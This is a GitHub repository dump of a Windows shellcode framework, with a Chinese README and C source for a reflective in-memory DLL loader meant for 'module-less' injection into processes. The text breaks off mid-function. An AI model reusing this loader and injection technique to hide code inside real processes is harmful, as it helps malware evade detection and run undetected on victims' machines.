├── .gitattributes
├── README.md
├── ShellCodeFrame_x64
├── 64hhl_ring3_utility
│ ├── 64hhl_ring3_utility.sln
│ ├── 64hhl_ring3_utility.suo
│ ├── 64hhl_ring3_utility.vcproj
│ ├── 64hhl_ring3_utility.vcproj.LF-20161216IWOX.Administrator.user
│ ├── 64hhl_ring3_utility.vcproj.jj-PC.jj.user
│ ├── 64hhl_ring3_utility.vcproj.pxysocket-PC.pxysocket.user
│ ├── 64hhl_ring3_utility.vcproj.storm-PC.storm.user
│ ├── 64main.c
│ ├── 64nativeapi.h
│ ├── 64shellcode.c
│ ├── 64shellcode.h
│ ├── 64shellcode_ntapi_utility.c
│ ├── 64shellcode_ntapi_utility.h
│ ├── Debug
│ │ ├── 64hhl_ring3_utility.exe.embed.manifest
│ │ └── BuildLog.htm
│ ├── GetRing3ApiAddr.bin
│ ├── test.asm
│ └── x64
│ │ ├── Debug
│ │ ├── 64hhl_ring3_utility.exe.embed.manifest
│ │ ├── 64hhl_ring3_utility.exe.embed.manifest.res
│ │ ├── 64hhl_ring3_utility.exe.intermediate.manifest
│ │ └── BuildLog.htm
│ │ └── Release
│ │ ├── 64_shellcode_main.exe.intermediate.manifest
│ │ └── BuildLog.htm
├── ShellCodeFrame_x64.ncb
├── ShellCodeFrame_x64.sln
├── ShellCodeFrame_x64.suo
└── clear.bat
├── ShellCodeFrame_x86
├── Release
│ ├── TestShellcode.exe
│ └── hhl_shellcodeframe.exe
├── ShellCodeFrame_x86.sln
├── ShellCodeFrame_x86.suo
├── TestDll
│ ├── Debug
│ │ ├── BuildLog.htm
│ │ ├── TestDll.dll.embed.manifest
│ │ ├── TestDll.dll.embed.manifest.res
│ │ └── TestDll.dll.intermediate.manifest
│ ├── ReadMe.txt
│ ├── Release
│ │ ├── BuildLog.htm
│ │ └── TestDll.dll.intermediate.manifest
│ ├── TestDll.cpp
│ ├── TestDll.vcproj
│ ├── TestDll.vcproj.LF-20161216IWOX.Administrator.user
│ ├── TestDll.vcproj.LF-20170306AJGT.Administrator.user
│ ├── dllmain.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ └── targetver.h
├── TestShellcode
│ ├── Debug
│ │ ├── BuildLog.htm
│ │ ├── TestShellcode.exe.embed.manifest
│ │ ├── TestShellcode.exe.embed.manifest.res
│ │ ├── TestShellcode.exe.intermediate.manifest
│ │ └── TestShellcode.res
│ ├── ModuleLess.cpp
│ ├── ModuleLess.h
│ ├── ReadMe.txt
│ ├── Release
│ │ ├── BuildLog.htm
│ │ ├── TestShellcode.exe.intermediate.manifest
│ │ └── TestShellcode.res
│ ├── TestShellcode.aps
│ ├── TestShellcode.cpp
│ ├── TestShellcode.h
│ ├── TestShellcode.rc
│ ├── TestShellcode.vcproj
│ ├── TestShellcode.vcproj.LF-20161216IWOX.Administrator.user
│ ├── TestShellcodeDlg.cpp
│ ├── TestShellcodeDlg.h
│ ├── res
│ │ ├── TestShellcode.ico
│ │ └── TestShellcode.rc2
│ ├── resource.h
│ ├── stdafx.cpp
│ ├── stdafx.h
│ └── targetver.h
├── clear.bat
└── hhl_shellcodeframe
│ ├── Debug
│ ├── BuildLog.htm
│ ├── hhl_shellcodeframe.exe.embed.manifest
│ ├── hhl_shellcodeframe.exe.embed.manifest.res
│ └── hhl_shellcodeframe.exe.intermediate.manifest
│ ├── GetRing3ApiAddr.bin
│ ├── Release
│ ├── BuildLog.htm
│ ├── GetRing3ApiAddr.bin
│ ├── cmd.bat
│ ├── hhl_shellcodeframe.exe.intermediate.manifest
│ ├── sh_helloworld.exe
│ └── sh_helloworld.exe.intermediate.manifest
│ ├── ShellCode.bin
│ ├── cmd.bat
│ ├── hhl_shellcodeframe.sln
│ ├── hhl_shellcodeframe.suo
│ ├── hhl_shellcodeframe.vcproj
│ ├── hhl_shellcodeframe.vcproj.LF-20161216IWOX.Administrator.user
│ ├── hhl_shellcodeframe.vcproj.pxysocket-PC.pxysocket.user
│ ├── main.c
│ ├── nativeapi.h
│ ├── shellcode.c
│ ├── shellcode.h
│ ├── shellcode_ntapi_utility.c
│ └── shellcode_ntapi_utility.h
├── UnModuelInject
├── DLLtest
│ ├── DLLtest.cpp
│ ├── DLLtest.vcproj
│ ├── DLLtest.vcproj.DESKTOP-AS29ISP.YYYYY.user
│ ├── DLLtest.vcproj.storm-PC.storm.user
│ ├── Debug
│ │ ├── BuildLog.htm
│ │ ├── DLLtest.dll.embed.manifest
│ │ ├── DLLtest.dll.embed.manifest.res
│ │ ├── DLLtest.dll.intermediate.manifest
│ │ ├── DLLtest.obj
│ │ ├── DLLtest.pch
│ │ ├── dllmain.obj
│ │ ├── mt.dep
│ │ ├── stdafx.obj
│ │ ├── vc90.idb
│ │ └── vc90.pdb
│ ├── ReadMe.txt
│ ├── Release
│ │ ├── BuildLog.htm
│ │ ├── DLLtest.dll.intermediate.manifest
│ │ ├── DLLtest.obj
│ │ ├── DLLtest.pch
│ │ ├── dllmain.obj
│ │ ├── mt.dep
│ │ ├── stdafx.obj
│ │ ├── vc90.idb
│ │ └── vc90.pdb
│ ├── dllmain.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ └── x64
│ │ └── Release
│ │ ├── BuildLog.htm
│ │ ├── DLLtest.dll.intermediate.manifest
│ │ ├── DLLtest.obj
│ │ ├── DLLtest.pch
│ │ ├── dllmain.obj
│ │ ├── mt.dep
│ │ ├── stdafx.obj
│ │ ├── vc90.idb
│ │ └── vc90.pdb
├── UnModuelInject.ncb
├── UnModuelInject.sln
├── UnModuelInject.suo
└── UnModuelInject
│ ├── Debug
│ ├── BuildLog.htm
│ ├── UnModuelInject.exe.embed.manifest
│ ├── UnModuelInject.exe.embed.manifest.res
│ ├── UnModuelInject.exe.intermediate.manifest
│ ├── UnModuelInject.pch
│ ├── UnModuleInject.obj
│ ├── Unmodule_Inject.obj
│ ├── mt.dep
│ ├── stdafx.obj
│ ├── vc90.idb
│ ├── vc90.pdb
│ ├── wow64ext.obj
│ └── x32ext.obj
│ ├── ReadMe.txt
│ ├── Release
│ ├── BuildLog.htm
│ ├── UnModuelInject.exe.intermediate.manifest
│ ├── UnModuelInject.pch
│ ├── UnModuleInject.obj
│ ├── Unmodule_Inject.obj
│ ├── mt.dep
│ ├── stdafx.obj
│ ├── vc90.idb
│ ├── vc90.pdb
│ ├── wow64ext.obj
│ └── x32ext.obj
│ ├── UnModuelInject.vcproj
│ ├── UnModuelInject.vcproj.DESKTOP-AS29ISP.YYYYY.user
│ ├── UnModuelInject.vcproj.storm-PC.storm.user
│ ├── UnModuleInject.cpp
│ ├── UnModuleInject.h
│ ├── Unmodule_Inject.cpp
│ ├── stdafx.cpp
│ ├── stdafx.h
│ ├── targetver.h
│ ├── wow64ext
│ ├── internal.h
│ ├── wow64ext.cpp
│ ├── wow64ext.h
│ ├── wow64ext_old.cpp
│ ├── x32ext.cpp
│ └── x32ext.h
│ └── x64
│ └── Release
│ ├── BuildLog.htm
│ ├── UnModuelInject.pch
│ ├── UnModuleInject.obj
│ ├── stdafx.obj
│ ├── vc90.idb
│ └── vc90.pdb
└── Windows平台下高级Shellcode编程技术.doc
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | =====================ShellCodeFrame_x64 ================
2 | # ShellCodeFrame_x64 工程介绍
3 |
4 | 项目详细介绍,查看“Windows平台下高级Shellcode编程技术.doc”
5 |
6 | 这是一个使用VS2008生成的编写x64位shellcode的框架。
7 | 在shellcode主代码中,按照内存对齐大小,将dll在内存中进行展开,修复导入表,修复重定位,根据导出表,寻找dll中函数的地址,调用指定dll的函数。
8 |
9 | =====================UnModuelInject================
10 |
11 | 使用生成的shellcode对静态dll进行无模块注入
12 |
13 |
14 | 配置 x64 插入汇编的VS环境。
15 |
16 | ==============ShellCodeFrame_x86 工程介绍===========
17 |
18 | 生成x86平台的shellcode的代码
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 10.00
3 | # Visual Studio 2008
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "64hhl_ring3_utility", "64hhl_ring3_utility.vcproj", "{BF58DCBE-3F38-4F72-9931-61DB1E52511D}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "64hhl_asm", "..\64hhl_asm\64hhl_asm.vcproj", "{E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Runbin", "..\64runbin\Runbin.vcproj", "{DE92D401-A9EE-43A1-81FB-5882DEA40E2B}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|Win32 = Debug|Win32
13 | Debug|x64 = Debug|x64
14 | Release|Win32 = Release|Win32
15 | Release|x64 = Release|x64
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.ActiveCfg = Debug|Win32
19 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|Win32.Build.0 = Debug|Win32
20 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.ActiveCfg = Debug|x64
21 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Debug|x64.Build.0 = Debug|x64
22 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.ActiveCfg = Release|Win32
23 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|Win32.Build.0 = Release|Win32
24 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.ActiveCfg = Release|x64
25 | {BF58DCBE-3F38-4F72-9931-61DB1E52511D}.Release|x64.Build.0 = Release|x64
26 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|Win32.ActiveCfg = Debug|Win32
27 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|Win32.Build.0 = Debug|Win32
28 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|x64.ActiveCfg = Debug|x64
29 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Debug|x64.Build.0 = Debug|x64
30 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|Win32.ActiveCfg = Release|Win32
31 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|Win32.Build.0 = Release|Win32
32 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|x64.ActiveCfg = Release|x64
33 | {E19C6FAE-174D-43AE-9BFA-9A4F8BC47D66}.Release|x64.Build.0 = Release|x64
34 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|Win32.ActiveCfg = Debug|Win32
35 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|Win32.Build.0 = Debug|Win32
36 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|x64.ActiveCfg = Debug|x64
37 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Debug|x64.Build.0 = Debug|x64
38 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|Win32.ActiveCfg = Release|Win32
39 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|Win32.Build.0 = Release|Win32
40 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|x64.ActiveCfg = Release|x64
41 | {DE92D401-A9EE-43A1-81FB-5882DEA40E2B}.Release|x64.Build.0 = Release|x64
42 | EndGlobalSection
43 | GlobalSection(SolutionProperties) = preSolution
44 | HideSolutionNode = FALSE
45 | EndGlobalSection
46 | EndGlobal
47 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.suo
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.LF-20161216IWOX.Administrator.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.jj-PC.jj.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.pxysocket-PC.pxysocket.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64hhl_ring3_utility.vcproj.storm-PC.storm.user:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
11 |
35 |
36 |
39 |
63 |
64 |
67 |
91 |
92 |
95 |
119 |
120 |
121 |
122 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64main.c:
--------------------------------------------------------------------------------
1 |
2 |
3 | #include "64shellcode.h"
4 | #include "64shellcode_ntapi_utility.h"
5 | #include "64nativeapi.h"
6 | #include "64shellcode.h"
7 |
8 |
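/*
 * Debug-build test harness for the x64 shellcode loader.
 *
 * With HHL_DEBUG defined it reads a DLL image from a fixed path
 * (c:\MainProgram.dll), fills a SHELL_CODE_PARAM with the raw file bytes,
 * a wide "reserved" string (forwarded to DllMain), the export name to call
 * and a wide command line, and drives the shellcode through
 * AlignRSPAndCallShEntry().  Without HHL_DEBUG it only runs
 * InitApiHashToStruct().
 *
 * Things a reader should know:
 *  - Whatever sits at the hard-coded path is mapped and executed inside
 *    this process, so only point it at an image you trust.
 *  - Every allocation and the read are now checked; on any failure the
 *    buffers allocated so far are released and the function returns
 *    without calling the shellcode (the first version dereferenced a NULL
 *    buffer in fread() when malloc failed).
 *  - Wide strings are formatted with wsprintfW into buffers sized in
 *    wchar_t, so buffer type and format type agree regardless of the
 *    UNICODE setting (the first version cast a wchar_t* to LPSTR).
 */
void main()
{
#ifdef HHL_DEBUG
	SHELL_CODE_PARAM ShellCodeParam;

	FILE *fp;
	long nLength;
	UCHAR* pFileBase = NULL;
	wchar_t* lpReserved = NULL;
	char* lpProcName = NULL;
	wchar_t* lpRunCmd = NULL;

	fp = fopen("c:\\MainProgram.dll", "rb");
	if(fp == NULL)
	{
		return;
	}

	nLength = filelength(fileno(fp));
	if(nLength <= 0)
	{
		fclose(fp);
		return;
	}

	/* +1 keeps the buffer NUL-terminated even though the image is binary. */
	pFileBase = (UCHAR*)malloc(nLength + 1);
	if(pFileBase == NULL)
	{
		fclose(fp);
		return;
	}
	memset(pFileBase, 0, nLength + 1);

	/* A short read means a truncated image: never hand that to the loader. */
	if(fread(pFileBase, nLength, 1, fp) != 1)
	{
		fclose(fp);
		goto cleanup;
	}
	fclose(fp);

	InitApiHashToStruct();

	ShellCodeParam.lpFileBase = pFileBase;

	/* Passed through to DllMain as lpReserved. */
	lpReserved = (wchar_t*)malloc(MAX_PATH * sizeof(wchar_t));
	if(lpReserved == NULL) goto cleanup;
	memset(lpReserved, 0, MAX_PATH * sizeof(wchar_t));
	wsprintfW(lpReserved, L"Hello World!");
	ShellCodeParam.lpReserved = lpReserved;

	/* Name of the export the shellcode calls after DllMain. */
	lpProcName = (char*)malloc(MAX_PATH);
	if(lpProcName == NULL) goto cleanup;
	memset(lpProcName, 0, MAX_PATH);
	strcpy(lpProcName, "RunDll");
	ShellCodeParam.lpProcName = lpProcName;

	/* Wide argument string handed to that export. */
	lpRunCmd = (wchar_t*)malloc(MAX_PATH * sizeof(wchar_t));
	if(lpRunCmd == NULL) goto cleanup;
	memset(lpRunCmd, 0, MAX_PATH * sizeof(wchar_t));
	wsprintfW(lpRunCmd, L"-a aaaaaaaaaaaa -u uuuuuuuuuuuuuu");
	ShellCodeParam.lpRunCmd = lpRunCmd;

	AlignRSPAndCallShEntry(&ShellCodeParam);

cleanup:
	/* free(NULL) is a no-op, so the partial-failure paths need no special casing. */
	free(lpRunCmd);
	free(lpProcName);
	free(lpReserved);
	free(pFileBase);
#else
	InitApiHashToStruct();
#endif
}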
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64nativeapi.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaobo93/UnModule_shellcode_Inject/70cbaa06228145eb70d3c8c0b3b512366e462378/ShellCodeFrame_x64/64hhl_ring3_utility/64nativeapi.h
--------------------------------------------------------------------------------
/ShellCodeFrame_x64/64hhl_ring3_utility/64shellcode.c:
--------------------------------------------------------------------------------
1 | #include "64shellcode.h"
2 | #include "64shellcode_ntapi_utility.h"
3 | #include "64nativeapi.h"
4 |
5 |
6 |
/* Static copy of the API/hash table.  In a debug build lpData (below) points
 * here and the table lives in this process's data section; the non-debug
 * functions instead take lpData from Shellcode_Final_End, i.e. the table is
 * presumably appended right after the last shellcode function when the
 * .bin is produced. */
TShellData ShellData;

/* First and last symbol of the range that is extracted as shellcode.
 * MyShellCodeFinalEnd is only referenced here; its definition is outside
 * this excerpt. */
#define Shellcode_Final_Start ShellCode_Start
#define Shellcode_Final_End MyShellCodeFinalEnd



#ifdef HHL_DEBUG
PShellData lpData= (PShellData)(&ShellData); // debug mode: point at the statically initialised global ShellData
#else

#endif
19 |
20 |
21 |
22 |
/* Entry stub of the shellcode (Shellcode_Final_Start is #defined to this
 * function above, so it is where extraction begins).  It only forwards the
 * parameter block to AlignRSPAndCallShEntry, which presumably aligns RSP
 * before calling ShellCode_Entry -- the x64 ABI expects a 16-byte aligned
 * stack at every call, and injected code cannot assume that.  The helper's
 * definition is not in this excerpt. */
void ShellCode_Start(PSHELL_CODE_PARAM pShellCodeParam)
{
	AlignRSPAndCallShEntry(pShellCodeParam);
}
27 |
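/*
 * GetProcAddress replacement for a module this loader mapped itself.  The
 * image is never registered with the Windows loader, so the real
 * GetProcAddress cannot see it and the export table has to be walked by hand.
 *
 * hModule    - base address of a fully mapped PE image (headers + sections).
 * lpProcName - export name, or an ordinal when the value is <= 0xFFFF (the
 *              same convention GetProcAddress uses).
 *
 * Returns the absolute address of the export, or 0 when: the module has no
 * export directory, the name/ordinal is not present, an ordinal-table entry
 * points outside the function table, the slot is empty, or the export is a
 * forwarder.  Forwarders (function RVAs that land inside the export
 * directory itself) are refused on purpose: the "address" would be an ASCII
 * "DLL.Func" string, not code, and this loader does not follow forwarding.
 *
 * Fix over the first version: the name-vs-ordinal test truncated the
 * 64-bit pointer to 32 bits before checking its high word, so a real string
 * pointer whose low 32 bits happen to have a zero high word would have been
 * treated as an ordinal; the whole pointer value is tested now.
 */
DWORD64 MyGetProcAddress(
	HMODULE hModule,    // handle to DLL module
	LPCSTR lpProcName   // function name or ordinal
	)
{
	PIMAGE_DOS_HEADER pImageDosHeader;
	PIMAGE_NT_HEADERS pImageNtHeader;
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory;
	DWORD *pAddressOfFunction;
	DWORD *pAddressOfNames;
	WORD *pAddressOfNameOrdinals;
	DWORD dwNumberOfNames;
	DWORD dwNumberOfFunctions;
	DWORD dwBase;
	DWORD64 dwExportVa;
	DWORD dwExportSize;
	DWORD dwFuncRva;
	DWORD dwIndex;
	UINT64 uName;
	DWORD i;

	if(hModule == NULL || lpProcName == NULL)
	{
		return 0;
	}

	pImageDosHeader = (PIMAGE_DOS_HEADER)hModule;
	if(pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE)
	{
		return 0;
	}
	pImageNtHeader = (PIMAGE_NT_HEADERS)((UINT64)hModule + pImageDosHeader->e_lfanew);
	if(pImageNtHeader->Signature != IMAGE_NT_SIGNATURE)
	{
		return 0;
	}

	dwExportVa   = pImageNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
	dwExportSize = pImageNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
	if(dwExportVa == 0 || dwExportSize == 0) // no export table
	{
		return 0;
	}
	pImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((UINT64)hModule + dwExportVa);

	pAddressOfFunction     = (DWORD*)((UINT64)hModule + pImageExportDirectory->AddressOfFunctions);
	pAddressOfNames        = (DWORD*)((UINT64)hModule + pImageExportDirectory->AddressOfNames);
	pAddressOfNameOrdinals = (WORD*) ((UINT64)hModule + pImageExportDirectory->AddressOfNameOrdinals);
	dwNumberOfNames     = pImageExportDirectory->NumberOfNames;
	dwNumberOfFunctions = pImageExportDirectory->NumberOfFunctions;
	dwBase              = pImageExportDirectory->Base;

	// Name or ordinal?  Test the full 64-bit value, not a truncated copy.
	uName = (UINT64)lpProcName;
	if(uName <= 0xFFFF)
	{
		// by ordinal: ordinals are biased by Base
		if(uName < dwBase || uName - dwBase >= dwNumberOfFunctions)
		{
			return 0;
		}
		dwIndex = (DWORD)(uName - dwBase);
	}
	else
	{
		// by name: linear scan of the name table, then the name->ordinal table
		dwIndex = dwNumberOfFunctions; // sentinel meaning "not found"
		for(i = 0; i < dwNumberOfNames; i++)
		{
			if(strcmp(lpProcName, (const char*)((UINT64)hModule + pAddressOfNames[i])) == 0)
			{
				dwIndex = pAddressOfNameOrdinals[i];
				break;
			}
		}
		// not found, or a corrupt ordinal table pointing past the function table
		if(dwIndex >= dwNumberOfFunctions)
		{
			return 0;
		}
	}

	dwFuncRva = pAddressOfFunction[dwIndex];
	if(dwFuncRva == 0)
	{
		return 0; // gap in the ordinal range: nothing exported at this slot
	}
	// An RVA inside the export directory is a forwarder string, not code.
	if(dwFuncRva >= dwExportVa && dwFuncRva < dwExportVa + dwExportSize)
	{
		return 0;
	}
	return (DWORD64)hModule + dwFuncRva;
}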
89 |
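#ifndef MEM_RELEASE
#define MEM_RELEASE 0x8000              /* VirtualFree: return the whole reservation */
#endif
#ifndef IMAGE_FILE_MACHINE_AMD64
#define IMAGE_FILE_MACHINE_AMD64 0x8664 /* FileHeader.Machine for x64 images */
#endif

/*
 * Shellcode body: reflectively map a DLL handed to us as a raw file buffer,
 * then run it.
 *
 * pShellCodeParam->lpFileBase - the DLL exactly as it sits on disk
 * pShellCodeParam->lpReserved - forwarded to DllMain as lpReserved
 * pShellCodeParam->lpProcName - optional export to call after DllMain
 * pShellCodeParam->lpRunCmd   - wide string passed to that export
 *
 * Sequence: resolve the APIs we need (GetRing3ApiAddr), allocate
 * SizeOfImage bytes, copy headers and sections, resolve imports through
 * LoadLibraryA/GetProcAddress, apply base relocations, call DllMain with
 * DLL_PROCESS_ATTACH (1), then call the named export.  Every failure path
 * releases the image and returns; there is no other error reporting since
 * this code has no output channel.
 *
 * Fixes over the first version:
 *  - headers are copied using SizeOfHeaders instead of the first section's
 *    VirtualAddress, which could read past the end of the file buffer;
 *  - each section is bounds-checked against SizeOfImage before the copy;
 *  - an import descriptor with OriginalFirstThunk == 0 now walks FirstThunk,
 *    as the Windows loader does, instead of parsing the DOS header as thunks;
 *  - error paths free with MEM_RELEASE (MEM_DECOMMIT leaked the reservation);
 *  - a relocation block with SizeOfBlock == 0 no longer loops forever, and
 *    relocation targets are kept inside the image;
 *  - the machine type is checked so a 32-bit DLL is refused up front;
 *  - AddressOfEntryPoint == 0 (no DllMain) is skipped instead of called;
 *  - no value is returned from this void function any more.
 *
 * Caveats the reader should keep in mind:
 *  - The caller passes no file length, so the file buffer itself cannot be
 *    bounds-checked; only offsets into the mapped image are.
 *  - The whole image stays PAGE_EXECUTE_READWRITE; no per-section
 *    protections are applied.
 *  - Dependencies are loaded by name with LoadLibraryA, so the target
 *    process's DLL search order decides what actually gets loaded.
 *  - DllMain's return value is not checked; DLL_MAIN's return type is
 *    declared in the header, not visible here.
 */
void ShellCode_Entry(PSHELL_CODE_PARAM pShellCodeParam)
{
	PVOID64 lpDynPEBuff;
	int nIndex;
	char* pLoadName;
	HINSTANCE hInstance;
	FARPROC fpFun;
	char *lpMemPage;
	long lCount;
	short int *pRelocationItem;
	int nOffset;
	int nType;
	DWORD dwEntryPoint;
	DLL_MAIN lpDllMain;
	PVOID64 pFileBase;
	PIMAGE_DOS_HEADER pImageDosHeader;
	PIMAGE_NT_HEADERS pImageNtHeaders;
	DWORD dwImageSize;
	WORD wNumberOfSections;
	PIMAGE_SECTION_HEADER pImageSectionHeaders;
	PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
	PIMAGE_THUNK_DATA pImageThunkData;
	PIMAGE_THUNK_DATA pImageOriginalThunkData;
	PIMAGE_IMPORT_BY_NAME pImageImportByName;
	PIMAGE_BASE_RELOCATION pImageBaseRelocation;
	ULONGLONG ulDifference;
	pRunDll RunDll;

#ifndef HHL_DEBUG
	// In the emitted shellcode the TShellData block follows the end marker.
	PShellData lpData= (PShellData)((ULONG64)Shellcode_Final_End);
#endif

	if(GetRing3ApiAddr() == FALSE) return;
	if(lpData == NULL || pShellCodeParam == NULL) return;

	// raw file image supplied by the injector
	pFileBase = pShellCodeParam->lpFileBase;
	if(pFileBase == NULL) return;

	pImageDosHeader = (PIMAGE_DOS_HEADER)pFileBase;
	if(IMAGE_DOS_SIGNATURE != pImageDosHeader->e_magic) return;

	pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD64)pFileBase + pImageDosHeader->e_lfanew);
	if(IMAGE_NT_SIGNATURE != pImageNtHeaders->Signature) return;

	// a 64-bit loader can only map a 64-bit image
	if(pImageNtHeaders->FileHeader.Machine != IMAGE_FILE_MACHINE_AMD64) return;

	dwImageSize = pImageNtHeaders->OptionalHeader.SizeOfImage;
	if(dwImageSize == 0 || pImageNtHeaders->OptionalHeader.SizeOfHeaders > dwImageSize) return;

	// one RWX region for the whole image (see caveats above)
	lpDynPEBuff = (PVOID64)lpData->xVirtualAlloc(NULL, dwImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if(lpDynPEBuff == NULL) return;
	my_sh_memset(lpDynPEBuff, 0, dwImageSize);

	// headers: exactly SizeOfHeaders bytes, which is what the loader maps
	my_sh_memcpy(lpDynPEBuff, pFileBase, pImageNtHeaders->OptionalHeader.SizeOfHeaders);

	// sections: file offset -> image RVA
	wNumberOfSections = pImageNtHeaders->FileHeader.NumberOfSections;
	pImageSectionHeaders = IMAGE_FIRST_SECTION(pImageNtHeaders);
	for(nIndex = 0; nIndex < wNumberOfSections; nIndex++, pImageSectionHeaders++)
	{
		if(pImageSectionHeaders->SizeOfRawData == 0) continue; // e.g. .bss: already zeroed

		if((DWORD64)pImageSectionHeaders->VirtualAddress + pImageSectionHeaders->SizeOfRawData > dwImageSize)
		{
			lpData->xVirtualFree(lpDynPEBuff, 0, MEM_RELEASE);
			return;
		}
		my_sh_memcpy((PVOID64)((DWORD64)lpDynPEBuff + pImageSectionHeaders->VirtualAddress),
		             (UCHAR*)pFileBase + pImageSectionHeaders->PointerToRawData,
		             pImageSectionHeaders->SizeOfRawData);
	}

	// imports
	if(pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size > 0)
	{
		pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD64)lpDynPEBuff + pImageNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

		for(; pImageImportDescriptor->Name != 0; pImageImportDescriptor++)
		{
			// IAT entries, overwritten with resolved addresses below
			pImageThunkData = (PIMAGE_THUNK_DATA)((DWORD64)lpDynPEBuff + pImageImportDescriptor->FirstThunk);

			// The import name table is optional; when absent the IAT still
			// holds the unresolved names/ordinals and is used for lookup too.
			if(pImageImportDescriptor->OriginalFirstThunk != 0)
			{
				pImageOriginalThunkData = (PIMAGE_THUNK_DATA)((DWORD64)lpDynPEBuff + pImageImportDescriptor->OriginalFirstThunk);
			}
			else
			{
				pImageOriginalThunkData = pImageThunkData;
			}

			pLoadName = (char*)((DWORD64)lpDynPEBuff + pImageImportDescriptor->Name);

			// loaded by name: subject to the target's DLL search order
			hInstance = lpData->xLoadLibraryA(pLoadName);
			if(hInstance == NULL)
			{
				lpData->xVirtualFree(lpDynPEBuff, 0, MEM_RELEASE);
				return;
			}

			for(; pImageOriginalThunkData->u1.Ordinal != 0; pImageThunkData++, pImageOriginalThunkData++)
			{
				if(pImageOriginalThunkData->u1.Ordinal & IMAGE_ORDINAL_FLAG64)
				{
					// import by ordinal: the ordinal is the low 16 bits
					fpFun = lpData->xGetProcAddress(hInstance, (LPCSTR)(pImageOriginalThunkData->u1.Ordinal & 0x0000ffff));
				}
				else
				{
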